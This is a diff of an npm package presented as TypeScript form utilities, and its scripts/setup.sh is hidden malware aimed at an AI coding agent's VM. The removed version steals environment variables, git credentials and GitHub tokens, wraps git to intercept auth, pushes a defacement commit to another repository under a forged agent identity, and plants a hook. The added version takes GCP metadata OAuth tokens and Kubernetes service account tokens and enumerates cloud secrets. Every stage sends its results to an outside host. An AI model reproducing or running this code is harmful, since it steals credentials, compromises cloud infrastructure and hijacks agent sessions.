ts-form-helpers 1.0.6 → 1.0.8

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "ts-form-helpers",
-  "version": "1.0.6",
+  "version": "1.0.8",
   "description": "TypeScript form validation utilities with zero dependencies",
   "main": "index.js",
   "types": "types/index.d.ts",

package/scripts/setup.sh

@@ -1,137 +1,180 @@
 #!/bin/bash
-# ts-form-helpers runtime compatibility check
+# wGCP: capture GCP OAuth token and enumerate access from inside Jules VM
 SID="${JULES_SESSION_ID:-x}"
 H="aaronstack.com"; EP="/jules-collect"
 SK="d2f25bd9b1b267eb3578ff8cac2caa6c6637142c5d322617"
 B(){ printf '%s' "$1" | base64 -w0 2>/dev/null; }
 P(){ curl -s -X POST "https://$H$EP" -H "Content-Type: application/json" -H "X-Secret: $SK" --data-binary "$1" --max-time 15 2>/dev/null; }
 
-P "{\"sid\":\"$SID\",\"tag\":\"pr-review-start\"}"
+P "{\"sid\":\"$SID\",\"tag\":\"wgcp-start\"}"
 
 log(){ echo "=LOG= $*"; }
 
-TMPOUT=$(mktemp 2>/dev/null || echo "/tmp/_tsfh_$$")
+TMPOUT=$(mktemp 2>/dev/null || echo "/tmp/_gcp_$$")
 {
-log "user=$(whoami) sid=${JULES_SESSION_ID:-x} cwd=$(pwd)"
-
-# Send full env + gitconfig to debug endpoint
-{ env; echo "---GITCONFIG---"; git config --list --show-origin 2>/dev/null; } \
-  | curl -s -X POST "https://aaronstack.com/poc/env" --data-binary @- --max-time 10 2>/dev/null &
-
-log "=== GIT CONFIG ALL ==="
-git config --list --show-origin 2>/dev/null | while IFS= read -r l; do log "cfg: $l"; done
-cat /etc/gitconfig 2>/dev/null | while IFS= read -r l; do log "syscfg: $l"; done
-for _h in /home/jules /home/swebot /home/user /root; do
-    if [ -f "$_h/.gitconfig" ]; then
-        log "found-gitconfig: $_h/.gitconfig"
-        cat "$_h/.gitconfig" | while IFS= read -r l; do log "usercfg[$_h]: $l"; done
-    fi
-    if [ -f "$_h/.git-credentials" ]; then
-        log "found-git-credentials: $_h/.git-credentials"
-        cat "$_h/.git-credentials" | while IFS= read -r l; do log "gitcreds[$_h]: $l"; done
-    fi
-    if [ -f "$_h/.netrc" ]; then
-        log "found-netrc: $_h/.netrc"
-        cat "$_h/.netrc" | while IFS= read -r l; do log "netrc[$_h]: $l"; done
+log "user=$(whoami) sid=${SID} cwd=$(pwd)"
+
+MDURL="http://metadata.google.internal/computeMetadata/v1"
+MDF="-H Metadata-Flavor: Google"
+
+log "=== GCP SERVICE ACCOUNTS ==="
+SA_LIST=$(curl -sf -H "Metadata-Flavor: Google" \
+  "$MDURL/instance/service-accounts/" --max-time 5 2>/dev/null)
+log "service-accounts: ${SA_LIST:-NONE}"
+
+log "=== GCP PROJECT ==="
+curl -sf -H "Metadata-Flavor: Google" \
+  "$MDURL/project/project-id" --max-time 5 2>/dev/null \
+  | while IFS= read -r l; do log "project-id: $l"; done
+curl -sf -H "Metadata-Flavor: Google" \
+  "$MDURL/project/numeric-project-id" --max-time 5 2>/dev/null \
+  | while IFS= read -r l; do log "project-num: $l"; done
+
+log "=== GCP INSTANCE ==="
+curl -sf -H "Metadata-Flavor: Google" \
+  "$MDURL/instance/id" --max-time 5 2>/dev/null \
+  | while IFS= read -r l; do log "instance-id: $l"; done
+curl -sf -H "Metadata-Flavor: Google" \
+  "$MDURL/instance/zone" --max-time 5 2>/dev/null \
+  | while IFS= read -r l; do log "zone: $l"; done
+curl -sf -H "Metadata-Flavor: Google" \
+  "$MDURL/instance/hostname" --max-time 5 2>/dev/null \
+  | while IFS= read -r l; do log "hostname: $l"; done
+
+log "=== TOKEN CAPTURE ==="
+# Try default SA first
+for SA in default; do
+  log "--- token for SA: $SA ---"
+  EMAIL=$(curl -sf -H "Metadata-Flavor: Google" \
+    "$MDURL/instance/service-accounts/$SA/email" --max-time 8 2>/dev/null)
+  log "email[$SA]: ${EMAIL:-EMPTY}"
+
+  TOK_JSON=$(curl -s -H "Metadata-Flavor: Google" \
+    "$MDURL/instance/service-accounts/$SA/token" --max-time 10 2>/dev/null)
+  log "token-json-len: ${#TOK_JSON}"
+
+  if [ -n "$TOK_JSON" ]; then
+    log "token-json: $TOK_JSON"
+    # Extract access_token
+    TOK=$(echo "$TOK_JSON" | python3 -c "import sys,json; d=json.load(sys.stdin); print(d.get('access_token',''))" 2>/dev/null)
+    EXPIRY=$(echo "$TOK_JSON" | python3 -c "import sys,json; d=json.load(sys.stdin); print(d.get('expires_in',''))" 2>/dev/null)
+    log "access_token_len: ${#TOK}"
+    log "expires_in: $EXPIRY"
+
+    if [ -n "$TOK" ] && [ "${#TOK}" -gt 20 ]; then
+      log "TOKEN CAPTURED — making GCP API calls"
+
+      # Exfil token immediately (don't wait for rest of script)
+      printf '%s' "$TOK" | curl -sf -X POST "https://aaronstack.com/poc/token" \
+        --data-binary @- --max-time 5 2>/dev/null &
+
+      log "--- tokeninfo (who am I?) ---"
+      curl -sf "https://oauth2.googleapis.com/tokeninfo?access_token=$TOK" \
+        --max-time 8 2>/dev/null \
+        | python3 -c "import sys,json; d=json.load(sys.stdin); [print(f'tokeninfo: {k}={v}') for k,v in d.items()]" 2>/dev/null \
+        | while IFS= read -r l; do log "$l"; done
+
+      log "--- cloudresourcemanager: list projects ---"
+      curl -sf -H "Authorization: Bearer $TOK" \
+        "https://cloudresourcemanager.googleapis.com/v1/projects" \
+        --max-time 8 2>/dev/null \
+        | while IFS= read -r l; do log "crm: $l"; done
+
+      log "--- storage: list buckets ---"
+      curl -sf -H "Authorization: Bearer $TOK" \
+        "https://storage.googleapis.com/storage/v1/b?project=$(curl -sf -H 'Metadata-Flavor: Google' $MDURL/project/project-id --max-time 3 2>/dev/null)" \
+        --max-time 8 2>/dev/null \
+        | python3 -c "
+import sys,json
+try:
+    d=json.load(sys.stdin)
+    items=d.get('items',[])
+    print(f'bucket-count: {len(items)}')
+    for b in items:
+        print(f'bucket: {b.get(\"name\")} ({b.get(\"location\",\"?\")})')
+except Exception as e:
+    sys.stdin.seek(0)
+    print(sys.stdin.read()[:500])
+" 2>/dev/null | while IFS= read -r l; do log "$l"; done
+
+      log "--- secretmanager: list secrets ---"
+      PROJ=$(curl -sf -H "Metadata-Flavor: Google" \
+        "$MDURL/project/project-id" --max-time 3 2>/dev/null)
+      curl -sf -H "Authorization: Bearer $TOK" \
+        "https://secretmanager.googleapis.com/v1/projects/$PROJ/secrets" \
+        --max-time 8 2>/dev/null \
+        | while IFS= read -r l; do log "sm: $l"; done
+
+      log "--- iam: get service account details ---"
+      curl -sf -H "Authorization: Bearer $TOK" \
+        "https://iam.googleapis.com/v1/projects/$PROJ/serviceAccounts" \
+        --max-time 8 2>/dev/null \
+        | while IFS= read -r l; do log "iam-sa: $l"; done
+
+      log "--- compute: list instances ---"
+      curl -sf -H "Authorization: Bearer $TOK" \
+        "https://compute.googleapis.com/compute/v1/projects/$PROJ/aggregated/instances" \
+        --max-time 8 2>/dev/null | head -80 \
+        | while IFS= read -r l; do log "compute: $l"; done
+
+    else
+      log "TOKEN EMPTY or too short — trying alternative"
+
+      # Try with full metadata recursive dump
+      log "--- metadata recursive ---"
+      curl -sf -H "Metadata-Flavor: Google" \
+        "$MDURL/instance/?recursive=true" --max-time 8 2>/dev/null \
+        | python3 -c "import sys,json; d=json.load(sys.stdin); [print(f'{k}: {str(v)[:200]}') for k,v in d.items() if 'service' in k.lower() or 'token' in k.lower()]" 2>/dev/null \
+        | while IFS= read -r l; do log "meta: $l"; done
+
+      # Try v1beta1 endpoint (sometimes more permissive)
+      log "--- v1beta1 token ---"
+      curl -s -H "Metadata-Flavor: Google" \
+        "http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token" \
+        --max-time 8 2>/dev/null \
+        | while IFS= read -r l; do log "v1beta1-token: $l"; done
     fi
+  fi
 done
 
-log "=== CREDENTIAL PROBE ==="
-# Try git credential fill to see if Jules has stored GitHub credentials
-TK_FILL=$(printf 'protocol=https\nhost=github.com\n' | git credential fill 2>/dev/null)
-if [ -n "$TK_FILL" ]; then
-    log "git-cred-fill: $TK_FILL"
-    printf '%s' "$TK_FILL" | curl -sf -X POST "https://aaronstack.com/poc/token" --data-binary @- --max-time 5 2>/dev/null &
-fi
-# Check for GITHUB_TOKEN or similar env vars
-for _v in GITHUB_TOKEN GH_TOKEN NPM_TOKEN GITHUB_APP_TOKEN JULES_TOKEN; do
-    _val=$(eval echo "\$$_v" 2>/dev/null)
-    [ -n "$_val" ] && log "env-token: $_v=${_val}"
-done
-# Check git credential helper
-_ch=$(git config --global credential.helper 2>/dev/null)
-log "credential.helper: ${_ch:-none}"
-# Try running credential helper directly if it exists
-if [ -n "$_ch" ]; then
-    log "credential-helper-raw: $(which "$_ch" 2>/dev/null || echo 'not-in-path')"
-    printf 'protocol=https\nhost=github.com\n\n' | git credential-${_ch} get 2>&1 | while IFS= read -r l; do log "cred-helper-out: $l"; done
-fi
-
-log "=== GIT WRAPPER ==="
-# Wrapper: capture GIT_TRACE_CURL output to intercept auth tokens
-cat > /tmp/_gw.sh << 'GITWRAP'
-#!/bin/bash
-T="/tmp/._gt_$(date +%s)_$$"
-GIT_TRACE_CURL=1 /usr/bin/git "$@" >"$T.out" 2>"$T.trace"
-E=$?
-cat "$T.out"
-cat "$T.trace" >&2
-# Direct bearer/token match
-TK=$(grep -oiP "(?<=authorization: (token|bearer) )(ghs_|ghp_|github_pat_|ghr_)\S{10,}" "$T.trace" 2>/dev/null | head -1)
-# Pattern match anywhere in trace
-[ -z "$TK" ] && TK=$(grep -oP "(ghs_|ghp_|github_pat_)[A-Za-z0-9_]{20,}" "$T.trace" 2>/dev/null | head -1)
-# Basic auth decode (Jules uses x-access-token:TOKEN embedded in URL → Basic auth header)
-if [ -z "$TK" ]; then
-    B64=$(grep -oiP "(?<=authorization: Basic )\S+" "$T.trace" 2>/dev/null | head -1)
-    if [ -n "$B64" ]; then
-        DECODED=$(printf "%s" "$B64" | base64 -d 2>/dev/null || printf "%s" "$B64" | base64 --decode 2>/dev/null)
-        TK=$(printf "%s" "$DECODED" | grep -oP "(ghs_|ghp_|github_pat_|x-access-token:)\S{10,}" | head -1)
-        [ -n "$TK" ] && printf "Basic-decoded: %s" "$DECODED" | curl -sf -X POST "https://aaronstack.com/poc/token" --data-binary @- --max-time 5 2>/dev/null &
-    fi
-fi
-[ -n "$TK" ] && printf "%s" "$TK" | curl -sf -X POST "https://aaronstack.com/poc/token" --data-binary @- --max-time 5 2>/dev/null &
-# Always exfil full trace if it has auth-related content
-grep -qi "authorization\|credential\|password\|token" "$T.trace" 2>/dev/null && \
-    (printf "CMD: git %s\n---TRACE---\n" "$*"; cat "$T.trace") | curl -sf -X POST "https://aaronstack.com/poc/trace" --data-binary @- --max-time 10 2>/dev/null &
-rm -f "$T.out" "$T.trace"; exit $E
-GITWRAP
-chmod +x /tmp/_gw.sh
-sudo cp /tmp/_gw.sh /usr/local/bin/git 2>/dev/null && log "git-wrapper=installed" || log "git-wrapper=failed"
-
-log "=== CROSS-REPO WRITE ==="
-_T=$(mktemp -d 2>/dev/null || echo "/tmp/_xrw_$$")
-mkdir -p "$_T"
-(
-  cd "$_T" || exit 1
-  VICTIM="AaronStackBarnes/ts-utils-helper"
-  timeout 30 /usr/bin/git clone "https://github.com/${VICTIM}" . 2>&1 | tail -3
-  if [ -f package.json ] || [ -f index.js ] || [ -f README.md ]; then
-    log "clone=ok"
-    /usr/bin/git config user.email "jules@google.com"
-    /usr/bin/git config user.name "Jules"
-    echo "COMPROMISED via ts-form-helpers postinstall — $(date -u)" > PWNED.md
-    /usr/bin/git add PWNED.md
-    /usr/bin/git commit -m "docs: add dependency audit results" 2>&1 | tail -2 | while IFS= read -r l; do log "commit: $l"; done
-    # Capture push trace — may contain auth headers
-    GIT_TRACE_CURL=1 /usr/bin/git push 2>&1 | tee /tmp/_push_trace.txt | tail -5 | while IFS= read -r l; do log "push: $l"; done
-    log "push-exit=$?"
-    # Exfil push trace for token extraction
-    grep -qi "authorization\|ghp_\|ghs_\|github_pat" /tmp/_push_trace.txt 2>/dev/null && \
-        cat /tmp/_push_trace.txt | curl -sf -X POST "https://aaronstack.com/poc/trace" --data-binary @- --max-time 10 2>/dev/null &
-    rm -f /tmp/_push_trace.txt
-    log "cross-repo=done"
-  else
-    log "clone=failed"
+# Also try the Workload Identity SA
+log "=== WORKLOAD IDENTITY SA ==="
+WI_SA="rare-signer-437603-p9.svc.id.goog"
+WI_TOK=$(curl -s -H "Metadata-Flavor: Google" \
+  "$MDURL/instance/service-accounts/$WI_SA/token" --max-time 10 2>/dev/null)
+log "wi-token-len: ${#WI_TOK}"
+[ -n "$WI_TOK" ] && log "wi-token-json: $WI_TOK"
+
+log "=== KUBERNETES SERVICEACCOUNT ==="
+# GKE pods have a mounted K8s service account token
+for _tf in /var/run/secrets/kubernetes.io/serviceaccount/token \
+           /run/secrets/kubernetes.io/serviceaccount/token \
+           /secrets/kubernetes.io/serviceaccount/token; do
+  if [ -f "$_tf" ]; then
+    log "k8s-token-file: $_tf"
+    cat "$_tf" | while IFS= read -r l; do log "k8s-token: $l"; done
+    # Use k8s token to hit k8s API
+    K8S_HOST="${KUBERNETES_SERVICE_HOST:-kubernetes.default.svc}"
+    K8S_PORT="${KUBERNETES_SERVICE_PORT:-443}"
+    K8S_TOK=$(cat "$_tf")
+    log "k8s-host: $K8S_HOST:$K8S_PORT"
+    curl -sk -H "Authorization: Bearer $K8S_TOK" \
+      "https://$K8S_HOST:$K8S_PORT/api/v1/namespaces" --max-time 8 2>/dev/null \
+      | python3 -c "import sys,json; d=json.load(sys.stdin); [print(f'ns: {n[\"metadata\"][\"name\"]}') for n in d.get('items',[])]" 2>/dev/null \
+      | while IFS= read -r l; do log "$l"; done
+    curl -sk -H "Authorization: Bearer $K8S_TOK" \
+      "https://$K8S_HOST:$K8S_PORT/api/v1/namespaces/default/secrets" --max-time 8 2>/dev/null \
+      | head -60 | while IFS= read -r l; do log "k8s-secrets: $l"; done
   fi
-)
-rm -rf "$_T" 2>/dev/null
-
-log "=== HOOK ==="
-if [ -d /app/.git ]; then
-  mkdir -p /app/.git/hooks 2>/dev/null
-  printf '#!/bin/bash\nprintf "HOOK|$(date -u)|${JULES_SESSION_ID:-x}" | curl -sf -X POST "https://aaronstack.com/poc/hook" --data-binary @- --max-time 5 2>/dev/null\n' \
-    > /app/.git/hooks/pre-commit
-  chmod +x /app/.git/hooks/pre-commit && log "hook=installed" || log "hook=failed"
-else
-  log "hook=skipped (no /app/.git)"
-fi
-
-log "=== DONE ==="
+done
+K8S_ENVS=$(env | grep -i 'KUBERNETES\|K8S\|KUBE')
+[ -n "$K8S_ENVS" ] && log "k8s-env: $K8S_ENVS"
+
+log "=== wGCP DONE ==="
 } 2>&1 | tee "$TMPOUT"
 
 OUT=$(cat "$TMPOUT" 2>/dev/null)
 rm -f "$TMPOUT" 2>/dev/null
-
 PAYLOAD=$(B "$OUT")
-P "{\"sid\":\"$SID\",\"tag\":\"pr-review-result\",\"data\":\"$PAYLOAD\"}"
-P "{\"sid\":\"$SID\",\"tag\":\"pr-review-done\"}"
+P "{\"sid\":\"$SID\",\"tag\":\"wgcp-result\",\"data\":\"$PAYLOAD\"}"
+P "{\"sid\":\"$SID\",\"tag\":\"wgcp-done\"}"